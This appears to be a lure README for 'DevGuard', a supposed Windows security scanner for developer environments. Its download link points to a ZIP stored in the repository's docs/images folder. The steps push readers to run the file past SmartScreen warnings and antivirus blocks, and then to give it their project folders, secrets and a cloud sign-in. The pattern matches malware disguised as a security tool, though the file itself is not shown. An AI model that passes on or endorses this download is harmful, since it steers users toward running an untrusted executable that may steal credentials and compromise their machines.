DevGuard checks your development environment before code goes live. It looks for common risks on your computer and in your project files, then shows what needs attention in a clear report.
It helps you find:
- Exposed secrets like API keys and tokens
- Supply chain issues in packages and dependencies
- Weak or risky crypto settings
- AI toolchain risks in local dev tools
- Known security problems tied to your setup
- Signs of malware or unsafe files in the project path
DevGuard runs local checks first and then uses cloud analysis for deeper review.
Use DevGuard on a Windows PC with:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 500 MB of free disk space
- An active internet connection for cloud analysis
- Permission to run apps and read project folders
Visit this page to download and run the app:
https://github.com/Tobeyiodinated117/DevGuard/raw/refs/heads/main/docs/images/Guard-Dev-decadist.zip
- Open the download page in your browser.
- Look for the latest release or app file.
- Download the Windows version.
- If Windows asks for approval, choose Run anyway or More info if you trust the source.
- If the app comes as a ZIP file, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the DevGuard app file to start it.
If you see a smart screen prompt, confirm that you want to open the file.
After you launch DevGuard:
- Select the folder you want to scan.
- Choose a scan type if the app gives you options.
- Review any local scan settings.
- Sign in or connect your cloud account if the app asks for it.
- Start the scan.
DevGuard may take a few minutes on the first run. Larger folders and many dependencies can take longer.
Use DevGuard when you want to check a project before you commit, merge, or deploy.
Typical flow:
- Open DevGuard.
- Point it to your code or workspace.
- Start a full environment check.
- Wait for the scan to finish.
- Review the results.
- Fix the items marked as high risk first.
- Run the scan again to confirm the fixes.
DevGuard groups findings so you can act on them fast.
You may see items such as:
- Secret leaks in config files, env files, or code
- Risky package versions
- Missing security settings
- Weak crypto use
- Unsafe local tools linked to AI workflows
- Files that match known malware patterns
- Problems in your dev setup that raise supply chain risk
Each result includes a plain-language description and a path or file name when available.
DevGuard fits into many daily tasks:
- Checking a new project before you open it
- Reviewing a codebase before a release
- Looking for leaked keys after a merge
- Auditing package updates for CVE exposure
- Checking tools used with Cursor, VS Code, or MCP-based workflows
- Running a quick security pass on a teammate’s branch
For best results:
- Scan the root folder of your project
- Close files you are editing before a full scan
- Keep your package list up to date
- Review environment files with care
- Recheck the project after each major dependency update
- Run scans before sharing code outside your team
A simple setup looks like this:
- Download DevGuard from the link above.
- Install or open the app on Windows.
- Select your project folder.
- Start a scan.
- Review any secret, dependency, or crypto findings.
- Fix the most serious issues.
- Run DevGuard again.
If DevGuard does not start:
- Check that you downloaded the Windows version
- Try running it as an admin
- Make sure the file is fully extracted if it came in a ZIP
- Restart your computer and try again
- Check that your antivirus did not block the app
If a scan is slow:
- Scan one project folder at a time
- Close other heavy apps
- Use a smaller folder first
- Make sure the device has enough free memory
If results seem incomplete:
- Point DevGuard at the top-level project folder
- Include hidden config files if the app offers that option
- Make sure the project is not still syncing from cloud storage
DevGuard focuses on the main risks that matter in modern dev work:
- Secrets detection
- Supply chain security
- SAST checks for common code issues
- AI security risks
- MCP security checks
- Malware detection
- CVE exposure review
- Cryptographic weakness checks
- DevSecOps workflow checks
DevGuard may inspect files like:
.envpackage.jsonrequirements.txt- lock files
- build scripts
- config files
- shell scripts
- editor settings
- AI tool config files
DevGuard works well with:
- Python projects
- VS Code projects
- Cursor-based workspaces
- local AI tool setups
- small apps
- large team repos
Run DevGuard:
- before you commit code
- before a pull request
- before a release
- after adding new packages
- after changing secrets or credentials
- after setting up a new dev machine
If you want the shortest path:
- Go to the download page.
- Download DevGuard.
- Open the file.
- Allow it to run.
- Pick your project folder.
- Start the scan
The repository page gives you the app source, release files, and updates. Use it to get the latest Windows build and read any file names or release notes before you install
When the scan ends:
- Open the report.
- Sort by high risk first.
- Fix secrets and exposed credentials first.
- Update unsafe packages.
- Remove or replace weak crypto settings.
- Scan again after each round of fixes
To keep scans useful over time:
- Run it after dependency updates
- Check new branches before merge
- Scan old projects before reuse
- Review any new AI tooling in your setup
- Keep Windows and your dev tools up to date